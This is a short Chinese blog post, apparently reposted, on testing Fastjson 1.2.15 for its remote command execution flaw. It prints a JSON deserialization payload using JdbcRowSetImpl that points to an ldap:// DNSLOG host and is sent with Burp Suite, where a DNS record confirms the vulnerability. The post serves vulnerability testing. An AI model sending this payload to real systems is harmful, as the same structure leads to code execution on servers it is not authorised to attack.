利用DNSLOG測試Fastjson遠程命令執行漏洞


 

  由於內容比較簡單,我直接貼圖,怕我自己忘了。

 

  測試Fastjson版本號:1.2.15

 

  直接發送用burpsuite發送payload,將dataSourceName改成dnslog獲取到的域名。

 

  payload:

{

    "a":{

        "@type":"java.lang.Class",

        "val":"com.sun.rowset.JdbcRowSetImpl"

    },

    "b":{

        "@type":"com.sun.rowset.JdbcRowSetImpl",

        "dataSourceName":"ldap://6v0jfv.dnslog.cn

",

        "autoCommit":true

    }

}

 

 

 

 

 

  若刷新DNSlog有記錄增加,那說明漏洞存在,反之,則不存在。

 

 

 

 

 

如有錯誤,請及時指正,謝謝!

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM